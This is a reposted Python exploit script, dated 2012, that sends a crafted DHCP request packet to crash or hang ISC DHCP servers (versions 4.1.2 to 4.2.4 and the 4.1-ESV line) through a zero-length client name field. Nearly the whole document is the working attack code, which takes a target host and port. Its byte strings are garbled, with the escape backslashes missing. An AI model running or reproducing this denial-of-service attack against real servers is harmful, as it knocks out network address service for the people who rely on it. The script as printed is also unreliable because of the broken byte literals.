Home / exploits SC DHCP 4.1.2 Denial Of Service
Posted on 30 July 2012
#!/usr/bin/python ''' SC DHCP 4.1.2 <> 4.2.4 and 4.1-ESV <> 4.1-ESV-R6 remote denial of service(infinite loop and CPU consumption/chew) via zero'ed client name length http://www.k1p0d.com ''' import socket import getopt from sys import argv def main(): args = argv[1:] try: args, useless = getopt.getopt(args, 'p:h:') args = dict(args) args['-p'] args['-h'] except: usage(argv[0]) exit(-1) dhcp_req_packet = ('x01x01x06x00x40x00x03x6f' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x22x5fxae' 'xa7xdfx00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x63x82x53x63' 'x35x01x03x32x04x0ax00x00' 'x01x0cx00' 'x37x0dx01x1cx02x03x0f' 'x06x77x0cx2cx2fx1ax79x2a' 'xffx00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00' 'x00x00x00x00') sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.connect((args['-h'], int(args['-p']))) sock.sendall(dhcp_req_packet) print 'Packet sent' sock.close() def usage(pyname): print ''' Usage: %s -h <host> -p <port> ''' % pyname if __name__ == "__main__": main()
